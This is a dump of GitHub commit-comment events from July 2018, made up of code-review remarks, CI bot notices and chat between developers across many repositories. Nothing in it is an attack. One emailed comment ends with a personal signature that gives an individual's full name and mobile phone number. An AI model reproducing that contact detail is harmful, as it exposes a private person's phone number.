{"id":"7996198668","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29782170,"position":null,"line":null,"path":null,"commit_id":"a3244a621c5a0608d0897ea606a09dd662c96daa","created_at":"2018-07-20T17:14:09Z","updated_at":"2018-07-20T17:14:09Z","author_association":"OWNER","body":"Thanks Andrew.  That was very helpful and I appreciate you taking the time.\n\nOn Fri, Jul 20, 2018 at 11:09 AM, Andrew Grant <notifications@github.com>\nwrote:\n\n> Suppose we have two threads, a main thread and a two helper threads.\n>\n> The main thread, at the time of this statement, has finished a depth 10\n> search. It has found a score of +800cp.\n> Helper thread one, at a depth of 9!, has just found a Mate in 4.\n> Helper thread two, at a depth of 11, has just found a +15.00 score.\n>\n> Under this case, I believe we would return the +1500 score, since the\n> depth 9 score would be passed over since it comes from a lower depth search\n> than the main thread's +800 score\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/protonspring/Stockfish/commit/a3244a621c5a0608d0897ea606a09dd662c96daa#commitcomment-29782114>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AcVnSBZFiT0xYdLU9RqxU32jryYW3Lhnks5uIg6sgaJpZM4VYYd2>\n> .\n>\n\n\n\n-- \nMichael T. Whiteley\nmobile: 801.707.6886\n"}},"created_at":"2018-07-20T17:14:09Z"}
{"id":"7996199326","type":"CommitCommentEvent","actor":{"login":"ckingdon95"},"repo":{"name":"lrennels/fund"},"payload":{"comment":{"id":29782174,"position":null,"line":null,"path":null,"commit_id":"ded0ef74e6da84ffae0b10c080c9a57684f06268","created_at":"2018-07-20T17:14:18Z","updated_at":"2018-07-20T17:14:18Z","author_association":"COLLABORATOR","body":"okay I guess I'm going crazy, it's working now and I have no idea what was different earlier when it wasn't... anyway feel free to undo this, sorry for changing it!"}},"created_at":"2018-07-20T17:14:18Z"}
{"id":"7996199804","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29782176,"position":36,"line":36,"path":"tests/fuzz/regex/libc/regexec.c","commit_id":"0d828a78c982fb2289b86ec619896bfda55c29d7","created_at":"2018-07-20T17:14:25Z","updated_at":"2018-07-20T17:14:25Z","author_association":"COLLABORATOR","body":"Return value must be checked for error."}},"created_at":"2018-07-20T17:14:25Z"}
{"id":"7996200852","type":"CommitCommentEvent","actor":{"login":"renahnschultz"},"repo":{"name":"renahnschultz/odonto-system-manager"},"payload":{"comment":{"id":29782181,"position":null,"line":null,"path":null,"commit_id":"844ab95970a9d6fa62fe3fd486040bc271e030de","created_at":"2018-07-20T17:14:39Z","updated_at":"2018-07-20T17:14:39Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criação do template do sistema.](https://trello.com/c/H6MrdHsK/4-cria%C3%A7%C3%A3o-do-template-do-sistema)"}},"created_at":"2018-07-20T17:14:39Z"}
{"id":"7996202088","type":"CommitCommentEvent","actor":{"login":"lrennels"},"repo":{"name":"lrennels/fund"},"payload":{"comment":{"id":29782183,"position":null,"line":null,"path":null,"commit_id":"ded0ef74e6da84ffae0b10c080c9a57684f06268","created_at":"2018-07-20T17:14:56Z","updated_at":"2018-07-20T17:14:56Z","author_association":"OWNER","body":"no problem at all!  I'll change it in my last push, no big deal"}},"created_at":"2018-07-20T17:14:56Z"}
{"id":"7996204941","type":"CommitCommentEvent","actor":{"login":"renahnschultz"},"repo":{"name":"renahnschultz/odonto-system-manager"},"payload":{"comment":{"id":29782190,"position":null,"line":null,"path":null,"commit_id":"771f260ef4988e26c46006d080f6f50fb14639c8","created_at":"2018-07-20T17:15:35Z","updated_at":"2018-07-20T17:15:35Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criação do template do sistema.](https://trello.com/c/H6MrdHsK/4-cria%C3%A7%C3%A3o-do-template-do-sistema)"}},"created_at":"2018-07-20T17:15:35Z"}
{"id":"7996205340","type":"CommitCommentEvent","actor":{"login":"renahnschultz"},"repo":{"name":"renahnschultz/odonto-system-manager"},"payload":{"comment":{"id":29782191,"position":null,"line":null,"path":null,"commit_id":"e8b1cb540a353da8bf9d4a93da9e3ae1bf2c596b","created_at":"2018-07-20T17:15:41Z","updated_at":"2018-07-20T17:15:41Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criação do template do sistema.](https://trello.com/c/H6MrdHsK/4-cria%C3%A7%C3%A3o-do-template-do-sistema)"}},"created_at":"2018-07-20T17:15:41Z"}
{"id":"7996208035","type":"CommitCommentEvent","actor":{"login":"trommler"},"repo":{"name":"trommler/ghc"},"payload":{"comment":{"id":29782201,"position":218,"line":218,"path":"libraries/ghc-heap/GHC/Exts/Heap.hs","commit_id":"ec22f7ddc81b40a9dbcf140e5cf44730cb776d00","created_at":"2018-07-20T17:16:18Z","updated_at":"2018-07-20T17:16:18Z","author_association":"OWNER","body":"Yes."}},"created_at":"2018-07-20T17:16:18Z"}
{"id":"7996208249","type":"CommitCommentEvent","actor":{"login":"trommler"},"repo":{"name":"trommler/ghc"},"payload":{"comment":{"id":29782202,"position":184,"line":184,"path":"libraries/ghc-heap/GHC/Exts/Heap.hs","commit_id":"ec22f7ddc81b40a9dbcf140e5cf44730cb776d00","created_at":"2018-07-20T17:16:21Z","updated_at":"2018-07-20T17:16:21Z","author_association":"OWNER","body":"This does not work on big endian systems."}},"created_at":"2018-07-20T17:16:21Z"}
{"id":"7996208316","type":"CommitCommentEvent","actor":{"login":"TatianaKobets"},"repo":{"name":"TatianaKobets/tatianakobets.github.io"},"payload":{"comment":{"id":29782203,"position":null,"line":null,"path":null,"commit_id":"6955957a325137a242db4cd27a0cd9e817e6ef05","created_at":"2018-07-20T17:16:22Z","updated_at":"2018-07-20T17:16:22Z","author_association":"OWNER","body":"delet"}},"created_at":"2018-07-20T17:16:22Z"}
{"id":"7996208542","type":"CommitCommentEvent","actor":{"login":"trommler"},"repo":{"name":"trommler/ghc"},"payload":{"comment":{"id":29782206,"position":172,"line":172,"path":"libraries/ghc-heap/GHC/Exts/Heap.hs","commit_id":"ec22f7ddc81b40a9dbcf140e5cf44730cb776d00","created_at":"2018-07-20T17:16:25Z","updated_at":"2018-07-20T17:16:25Z","author_association":"OWNER","body":"This does not work on big endian systems."}},"created_at":"2018-07-20T17:16:25Z"}
{"id":"7996208910","type":"CommitCommentEvent","actor":{"login":"TatianaKobets"},"repo":{"name":"TatianaKobets/tatianakobets.github.io"},"payload":{"comment":{"id":29782208,"position":null,"line":null,"path":null,"commit_id":"6955957a325137a242db4cd27a0cd9e817e6ef05","created_at":"2018-07-20T17:16:30Z","updated_at":"2018-07-20T17:16:30Z","author_association":"OWNER","body":"delet"}},"created_at":"2018-07-20T17:16:30Z"}
{"id":"7996209877","type":"CommitCommentEvent","actor":{"login":"VladislavAntonyuk"},"repo":{"name":"xamarin/Xamarin.Forms"},"payload":{"comment":{"id":29782212,"position":12,"line":32,"path":"Xamarin.Forms.Platform.MacOS/FormsApplicationDelegate.cs","commit_id":"b901924d6447b73b5af2bb6d3eee1a58eb6c4cf0","created_at":"2018-07-20T17:16:43Z","updated_at":"2018-07-20T17:16:43Z","author_association":"NONE","body":"what if there is no MainMenu?"}},"created_at":"2018-07-20T17:16:43Z"}
{"id":"7996209921","type":"CommitCommentEvent","actor":{"login":"renahnschultz"},"repo":{"name":"renahnschultz/odonto-system-manager"},"payload":{"comment":{"id":29782213,"position":null,"line":null,"path":null,"commit_id":"ab69c6f69f1a003fbbb3e4ebae5fba72f67cefc4","created_at":"2018-07-20T17:16:44Z","updated_at":"2018-07-20T17:16:44Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Cadastro de Paciente](https://trello.com/c/KrglObWY/2-cadastro-de-paciente)"}},"created_at":"2018-07-20T17:16:44Z"}
{"id":"7996211390","type":"CommitCommentEvent","actor":{"login":"favourkiiza"},"repo":{"name":"oburuephraim/R-recess-repo-Group-20"},"payload":{"comment":{"id":29782215,"position":null,"line":null,"path":null,"commit_id":"24e3412e7df52109ffdbba3ca899af652b19ba32","created_at":"2018-07-20T17:17:05Z","updated_at":"2018-07-20T17:17:05Z","author_association":"COLLABORATOR","body":"\r\n[A Software Design Specification.docx](https://github.com/oburuephraim/R-recess-repo-Group-20/files/2214806/A.Software.Design.Specification.docx)\r\n"}},"created_at":"2018-07-20T17:17:05Z"}
{"id":"7996213874","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29782221,"position":null,"line":null,"path":null,"commit_id":"0d828a78c982fb2289b86ec619896bfda55c29d7","created_at":"2018-07-20T17:17:39Z","updated_at":"2018-07-20T17:17:39Z","author_association":"COLLABORATOR","body":"> If the preg argument to regexec() or regfree() is not a compiled regular expression returned by regcomp(), the result is undefined. A preg is no longer treated as a compiled regular expression after it is given to regfree()."}},"created_at":"2018-07-20T17:17:39Z"}
{"id":"7996215546","type":"CommitCommentEvent","actor":{"login":"favourkiiza"},"repo":{"name":"oburuephraim/R-recess-repo-Group-20"},"payload":{"comment":{"id":29782227,"position":null,"line":null,"path":null,"commit_id":"24e3412e7df52109ffdbba3ca899af652b19ba32","created_at":"2018-07-20T17:18:02Z","updated_at":"2018-07-20T17:18:02Z","author_association":"COLLABORATOR","body":"improved SDD"}},"created_at":"2018-07-20T17:18:02Z"}
{"id":"7996217938","type":"CommitCommentEvent","actor":{"login":"rodrigob"},"repo":{"name":"tensorflow/tfjs-core"},"payload":{"comment":{"id":29782234,"position":149,"line":3289,"path":"src/ops/array_ops_test.ts","commit_id":"bf22fc3468fd3027309b60c116b677226e0c0184","created_at":"2018-07-20T17:18:34Z","updated_at":"2018-07-20T17:18:34Z","author_association":"NONE","body":"Should there be a test checking that batchToSpaceND and spaceToBatchND interact well with each other ?"}},"created_at":"2018-07-20T17:18:34Z"}
{"id":"7996219323","type":"CommitCommentEvent","actor":{"login":"sampaccoud"},"repo":{"name":"openfun/arnold"},"payload":{"comment":{"id":29782237,"position":5,"line":159,"path":".circleci/config.yml","commit_id":"b6bd1c0d0fe46f6160a2fef0ca66f4506b2fd380","created_at":"2018-07-20T17:18:53Z","updated_at":"2018-07-20T17:18:53Z","author_association":"CONTRIBUTOR","body":"Call it the same as in _config.sh OPENSHIFT_HOST  ? "}},"created_at":"2018-07-20T17:18:53Z"}
{"id":"7996229563","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"saproj/Stockfish"},"payload":{"comment":{"id":29782250,"position":null,"line":null,"path":null,"commit_id":"1629ceb5e6446db5ccc34966d25ae18434a9d417","created_at":"2018-07-20T17:21:10Z","updated_at":"2018-07-20T17:21:10Z","author_association":"NONE","body":"@saproj \r\nThis was last time tried for 5-6 month (9. Feb) and failed\r\nhttp://tests.stockfishchess.org/tests/view/5a7d7b410ebc5902971a9ba9\r\n\r\nHave you some reasoning why this would now do better?"}},"created_at":"2018-07-20T17:21:10Z"}
{"id":"7996233129","type":"CommitCommentEvent","actor":{"login":"pavolloffay"},"repo":{"name":"openshift-istio/openshift-ansible"},"payload":{"comment":{"id":29782256,"position":4,"line":8,"path":"roles/openshift_istio/defaults/main.yml","commit_id":"15a3580585979ce93d3096e9c444f7875b82dc53","created_at":"2018-07-20T17:21:58Z","updated_at":"2018-07-20T17:21:58Z","author_association":"NONE","body":"Sorry not clear.\r\n\r\nWhat is the default amount of memory available to elasticsearch? "}},"created_at":"2018-07-20T17:21:58Z"}
{"id":"7996233512","type":"CommitCommentEvent","actor":{"login":"hashseed"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29782257,"position":null,"line":null,"path":null,"commit_id":"5e5ffc81fa823221777ab7c9fed33093afdfa876","created_at":"2018-07-20T17:22:03Z","updated_at":"2018-07-20T17:22:03Z","author_association":"MEMBER","body":"Hm. I must have misused ncu to land this. Somehow none of the commit message changes I thought it made has been committed. :/"}},"created_at":"2018-07-20T17:22:03Z"}
{"id":"7996234232","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29782260,"position":18,"line":18,"path":"tests/fuzz/regex/libc/regcomp.c","commit_id":"0d828a78c982fb2289b86ec619896bfda55c29d7","created_at":"2018-07-20T17:22:13Z","updated_at":"2018-07-20T17:22:13Z","author_association":"COLLABORATOR","body":"I would fuzz these flags too."}},"created_at":"2018-07-20T17:22:13Z"}
{"id":"7996235117","type":"CommitCommentEvent","actor":{"login":"xusunny"},"repo":{"name":"eerimoq/asn1tools"},"payload":{"comment":{"id":29782263,"position":null,"line":null,"path":null,"commit_id":"c67063c30d3c4e2aba5597c8dc80eb6a6cb48714","created_at":"2018-07-20T17:22:25Z","updated_at":"2018-07-20T17:22:25Z","author_association":"NONE","body":"hello , I used your code, but can you tell me how to import other asn1 specification file , what's the format?\r\nmaybe like \r\n'import': {modulename:  typename}?"}},"created_at":"2018-07-20T17:22:25Z"}
{"id":"7996236544","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29782265,"position":27,"line":27,"path":"tests/fuzz/regex/libc/regexec.c","commit_id":"0d828a78c982fb2289b86ec619896bfda55c29d7","created_at":"2018-07-20T17:22:42Z","updated_at":"2018-07-20T17:22:42Z","author_association":"COLLABORATOR","body":"Please fuzz these flags too."}},"created_at":"2018-07-20T17:22:42Z"}
{"id":"7996240862","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"saproj/Stockfish"},"payload":{"comment":{"id":29782272,"position":null,"line":null,"path":null,"commit_id":"1629ceb5e6446db5ccc34966d25ae18434a9d417","created_at":"2018-07-20T17:23:40Z","updated_at":"2018-07-20T17:23:40Z","author_association":"NONE","body":"@saproj \r\nI have now seen that in this test some compensation in another parameter is used. I approved."}},"created_at":"2018-07-20T17:23:40Z"}
{"id":"7996241565","type":"CommitCommentEvent","actor":{"login":"muhammaduhamza"},"repo":{"name":"sutara79/convert-mysql-to-sqlite"},"payload":{"comment":{"id":29782275,"position":null,"line":null,"path":null,"commit_id":"9dd516071a52d4eae5c2196576f06251193bc5db","created_at":"2018-07-20T17:23:50Z","updated_at":"2018-07-20T17:23:50Z","author_association":"NONE","body":"I have seen them , And I have used the first link it failed\r\n "}},"created_at":"2018-07-20T17:23:50Z"}
{"id":"7996241759","type":"CommitCommentEvent","actor":{"login":"tnayanam"},"repo":{"name":"tnayanam/WebApi"},"payload":{"comment":{"id":29782277,"position":10,"line":50,"path":"Baseline/CountingKs/CountingKs/Controllers/DiaryEntriesController.cs","commit_id":"9637b1bde011b52e16a916a2d347da6c03ed293f","created_at":"2018-07-20T17:23:52Z","updated_at":"2018-07-20T17:23:52Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/17131576/43016214-241481f0-8c20-11e8-9fe1-a76ab3d56176.png)\r\n"}},"created_at":"2018-07-20T17:23:52Z"}
{"id":"7996268084","type":"CommitCommentEvent","actor":{"login":"nathaliequirozn"},"repo":{"name":"nathaliequirozn/primerjs"},"payload":{"comment":{"id":29782333,"position":null,"line":null,"path":null,"commit_id":"03f1330574cc8fcb63df02d35ccbddaaff030f6a","created_at":"2018-07-20T17:29:45Z","updated_at":"2018-07-20T17:29:45Z","author_association":"OWNER","body":"Mi primer !Hola mundo! cuantos recuerdos , bueno, alguno me comprenderá, de la primera vez que lo escuchas! al escucharlo ahora y comprender todo lo que significa , una ventana al mundo...!!!  y también lo lejos que estoy de ese horizonte digital, aunque cada día un poquito más cerca, eso creo ;) "}},"created_at":"2018-07-20T17:29:45Z"}
{"id":"7996269184","type":"CommitCommentEvent","actor":{"login":"redking12"},"repo":{"name":"arghyac35/android_device_lenovo_kuntao"},"payload":{"comment":{"id":29782337,"position":null,"line":null,"path":null,"commit_id":"cebea36c09c4bded395b2c05dcdcc1c1558e1882","created_at":"2018-07-20T17:30:00Z","updated_at":"2018-07-20T17:30:00Z","author_association":"CONTRIBUTOR","body":"wew nice to see someone actully following authorship/."}},"created_at":"2018-07-20T17:30:00Z"}
{"id":"7996274091","type":"CommitCommentEvent","actor":{"login":"arubio"},"repo":{"name":"VictorAlbertos/song_to_song"},"payload":{"comment":{"id":29782358,"position":7,"line":21,"path":"src/main/java/song_to_song/Artist.java","commit_id":"30ff560de99a71d534b6b7f398906c6413c42f91","created_at":"2018-07-20T17:31:03Z","updated_at":"2018-07-20T17:31:03Z","author_association":"COLLABORATOR","body":"I'd rename this to \"fullName()\""}},"created_at":"2018-07-20T17:31:03Z"}
{"id":"7996282597","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29782375,"position":null,"line":null,"path":null,"commit_id":"0d828a78c982fb2289b86ec619896bfda55c29d7","created_at":"2018-07-20T17:32:49Z","updated_at":"2018-07-20T17:32:49Z","author_association":"COLLABORATOR","body":"Please try to apply the changes:\r\n\r\n - check return status from regcomp(3) and regexec(3) always,\r\n - no I/O functions in each iteration unless needed for debugging purposes (if so, we can ifdef it),\r\n - please include in the fuzzing process flag to regcomp(3) {a trick with checking for length and `memcpy(&flag, Data, sizeof(int))` is fine}\r\n - please include in the fuzzing process eflag to regexec(3) {the same trick as in regcomp(3)}\r\n - please delete the current findings.\r\n\r\nPlease repeat fuzzing and we will keep investigating further."}},"created_at":"2018-07-20T17:32:49Z"}
{"id":"7996284418","type":"CommitCommentEvent","actor":{"login":"eerimoq"},"repo":{"name":"eerimoq/asn1tools"},"payload":{"comment":{"id":29782380,"position":null,"line":null,"path":null,"commit_id":"c67063c30d3c4e2aba5597c8dc80eb6a6cb48714","created_at":"2018-07-20T17:33:13Z","updated_at":"2018-07-20T17:33:13Z","author_association":"OWNER","body":"Sorry, but I don't understand the question.\r\n\r\nHere is an example: https://github.com/eerimoq/asn1tools#example-usage"}},"created_at":"2018-07-20T17:33:13Z"}
{"id":"7996285576","type":"CommitCommentEvent","actor":{"login":"w3farid"},"repo":{"name":"w3farid/Tomcat-Deploy-in-java-project"},"payload":{"comment":{"id":29782383,"position":null,"line":null,"path":null,"commit_id":"f2eecf4435d6e23702818ef8b51596bd1a108eae","created_at":"2018-07-20T17:33:29Z","updated_at":"2018-07-20T17:33:29Z","author_association":"OWNER","body":"tomcat 8 configurations"}},"created_at":"2018-07-20T17:33:29Z"}
{"id":"7996286354","type":"CommitCommentEvent","actor":{"login":"knrc"},"repo":{"name":"openshift-istio/openshift-ansible"},"payload":{"comment":{"id":29782384,"position":4,"line":8,"path":"roles/openshift_istio/defaults/main.yml","commit_id":"15a3580585979ce93d3096e9c444f7875b82dc53","created_at":"2018-07-20T17:33:40Z","updated_at":"2018-07-20T17:33:40Z","author_association":"NONE","body":"That depends on the option sent in by istiooc/template, this particular value represents the default value specified in the elasticsearch yaml file and will be replaced by whatever is passed in.\r\n\r\nThe value we are supplying in our template is 1Gi, see the change in this commit, and the value on the command line depends on what the user chooses but as the docs show also defaults to 1Gi.\r\n\r\n> luggage:~ kevin$ istiooc help cluster up | grep memory\r\n>      --istio-elasticsearch-memory='1Gi': Specify the amount of memory required for the Elasticsearch deployments (experimental)\r\n"}},"created_at":"2018-07-20T17:33:40Z"}
{"id":"7996287128","type":"CommitCommentEvent","actor":{"login":"arubio"},"repo":{"name":"VictorAlbertos/song_to_song"},"payload":{"comment":{"id":29782386,"position":8,"line":22,"path":"src/main/java/song_to_song/Artist.java","commit_id":"30ff560de99a71d534b6b7f398906c6413c42f91","created_at":"2018-07-20T17:33:51Z","updated_at":"2018-07-20T17:33:51Z","author_association":"COLLABORATOR","body":"Why use the public getters when you can use the private variables?"}},"created_at":"2018-07-20T17:33:51Z"}
{"id":"7996302626","type":"CommitCommentEvent","actor":{"login":"AndrewRAN"},"repo":{"name":"group-butler/GroupButler"},"payload":{"comment":{"id":29782413,"position":null,"line":null,"path":null,"commit_id":"fc12590b0936dbae4072d2813680f114e4894da0","created_at":"2018-07-20T17:37:16Z","updated_at":"2018-07-20T17:37:16Z","author_association":"NONE","body":"localization updated again? xd"}},"created_at":"2018-07-20T17:37:16Z"}
{"id":"7996304660","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29782419,"position":null,"line":null,"path":null,"commit_id":"62f03a611c27e36181296bbb7d690f3beb7df6d8","created_at":"2018-07-20T17:37:45Z","updated_at":"2018-07-20T17:37:45Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-845](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-845).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-845-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T17:37:45Z"}
{"id":"7996305574","type":"CommitCommentEvent","actor":{"login":"ghostfur"},"repo":{"name":"AionGermany/aion-germany"},"payload":{"comment":{"id":29782420,"position":null,"line":null,"path":null,"commit_id":"cbbd48d17ee2f53ecb01a7ec9641ece0ea1ebecb","created_at":"2018-07-20T17:37:56Z","updated_at":"2018-07-20T17:37:56Z","author_association":"CONTRIBUTOR","body":"Thanks Frozen! "}},"created_at":"2018-07-20T17:37:56Z"}
{"id":"7996307482","type":"CommitCommentEvent","actor":{"login":"berndbohmeier"},"repo":{"name":"trustlines-network/clientlib"},"payload":{"comment":{"id":29782428,"position":null,"line":null,"path":null,"commit_id":"760a6b480ef32d9a228016b49ebeab9935398b75","created_at":"2018-07-20T17:38:21Z","updated_at":"2018-07-20T17:38:21Z","author_association":"COLLABORATOR","body":"Why does it not work with decimals? This way it will break again when we change the names, even though the names do not matter. "}},"created_at":"2018-07-20T17:38:21Z"}
{"id":"7996307966","type":"CommitCommentEvent","actor":{"login":"sir-pinecone"},"repo":{"name":"nafeu/oavp"},"payload":{"comment":{"id":29782430,"position":5,"line":55,"path":"src/helpers.pde","commit_id":"2572274561ca4ed0acac53be29654539ef841359","created_at":"2018-07-20T17:38:28Z","updated_at":"2018-07-20T17:38:28Z","author_association":"CONTRIBUTOR","body":"@nafeu just to clarify a bit, I noticed you are calling exit() here and after each call to debugError. Those later exit calls aren't reached right?"}},"created_at":"2018-07-20T17:38:28Z"}
{"id":"7996308178","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29782433,"position":null,"line":null,"path":null,"commit_id":"cb957e577589f3f044fcb44c941ecfdbc63184ba","created_at":"2018-07-20T17:38:31Z","updated_at":"2018-07-20T17:38:31Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-847](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-847).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-847-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T17:38:31Z"}
{"id":"7996312096","type":"CommitCommentEvent","actor":{"login":"NBR-hugh"},"repo":{"name":"Vwan/sicp-lamp"},"payload":{"comment":{"id":29782441,"position":43,"line":458,"path":"ch1/1.3FormulatingAbstractionswithHigher-OrderProcedures.md","commit_id":"4b2efe1029d6d211e1c000f5189329fa29d91051","created_at":"2018-07-20T17:39:22Z","updated_at":"2018-07-20T17:39:22Z","author_association":"NONE","body":"@Vwan  这里独立看可能不明白,但是是基于前面推出来的,即当 f(a) <0<f(b) 的假设下, 我们去求 f((a+b)/2)的值, 大于0说明0解在左边,小于0说明0解在右边"}},"created_at":"2018-07-20T17:39:22Z"}
{"id":"7996313811","type":"CommitCommentEvent","actor":{"login":"wilder5912"},"repo":{"name":"wilder5912/project_1A-S"},"payload":{"comment":{"id":29782443,"position":null,"line":null,"path":null,"commit_id":"13140f247c9656d1573e508754552e7bee4d8e44","created_at":"2018-07-20T17:39:45Z","updated_at":"2018-07-20T17:39:45Z","author_association":"OWNER","body":"congratulation my firend "}},"created_at":"2018-07-20T17:39:45Z"}
{"id":"7996333077","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-sjplot-feedstock"},"payload":{"comment":{"id":29782494,"position":null,"line":null,"path":null,"commit_id":"38fc6ab9d34b41c47b753c76d695f542c7c6ed6f","created_at":"2018-07-20T17:44:04Z","updated_at":"2018-07-20T17:44:04Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @ccwang002 was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T17:44:04Z"}
{"id":"7996334715","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29782498,"position":null,"line":null,"path":null,"commit_id":"74bc15fcf31878278cb8f8281a1bbde843e6ae1c","created_at":"2018-07-20T17:44:26Z","updated_at":"2018-07-20T17:44:26Z","author_association":"COLLABORATOR","body":"Please refer to notes in https://github.com/plusun/src/commit/0d828a78c982fb2289b86ec619896bfda55c29d7\r\n\r\nThere is a room for improvement.\r\n\r\nAccording to my research there is no need for comparison with other implementations out of the basesystem. We can be confident that no crashes are allowed."}},"created_at":"2018-07-20T17:44:26Z"}
{"id":"7996339017","type":"CommitCommentEvent","actor":{"login":"oliuz"},"repo":{"name":"pierobot/mangapie"},"payload":{"comment":{"id":29782513,"position":null,"line":null,"path":null,"commit_id":"bde57a0f62b9c297665caac982c0c7ccff91e056","created_at":"2018-07-20T17:45:21Z","updated_at":"2018-07-20T17:45:21Z","author_association":"NONE","body":"Don't work!\r\n"}},"created_at":"2018-07-20T17:45:21Z"}
{"id":"7996339399","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29782515,"position":null,"line":null,"path":null,"commit_id":"0f595ccfe511236202a955e961a947ba5c476772","created_at":"2018-07-20T17:45:26Z","updated_at":"2018-07-20T17:45:26Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-849](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-849).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-849-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T17:45:26Z"}
{"id":"7996341172","type":"CommitCommentEvent","actor":{"login":"mominul"},"repo":{"name":"OpenBangla/OpenBangla-Keyboard"},"payload":{"comment":{"id":29782520,"position":null,"line":null,"path":null,"commit_id":"3f106a0cbf6c3d929c78a79f62e22dd90e859de0","created_at":"2018-07-20T17:45:50Z","updated_at":"2018-07-20T17:45:50Z","author_association":"MEMBER","body":"@Adyel :relaxed:"}},"created_at":"2018-07-20T17:45:50Z"}
{"id":"7996342597","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29782524,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-20T17:46:08Z","updated_at":"2018-07-20T17:46:08Z","author_association":"NONE","body":"Correct-merge-mistake-with-initializing-CoilDesWaterDeltaT (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1694 of 1694 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-20T17:46:08Z"}
{"id":"7996345830","type":"CommitCommentEvent","actor":{"login":"Octogonapus"},"repo":{"name":"purduesigbots/pros-docs"},"payload":{"comment":{"id":29782534,"position":6,"line":6,"path":"v5/okapi/tutorials/concepts/controller-io.rst","commit_id":"c7eb5068dfac10d69daea5ed97ea23e83f42fa3a","created_at":"2018-07-20T17:46:47Z","updated_at":"2018-07-20T17:46:47Z","author_association":"COLLABORATOR","body":"`Okapilib` should be `OkapiLib`"}},"created_at":"2018-07-20T17:46:47Z"}
{"id":"7996346733","type":"CommitCommentEvent","actor":{"login":"madhavigeddam24"},"repo":{"name":"madhavigeddam24/FOX_Assig_Madhavi"},"payload":{"comment":{"id":29782536,"position":null,"line":null,"path":null,"commit_id":"fa2fdc7a83b95821d4ce99516fe7e943fc8d269e","created_at":"2018-07-20T17:46:59Z","updated_at":"2018-07-20T17:46:59Z","author_association":"OWNER","body":"looks good"}},"created_at":"2018-07-20T17:46:59Z"}
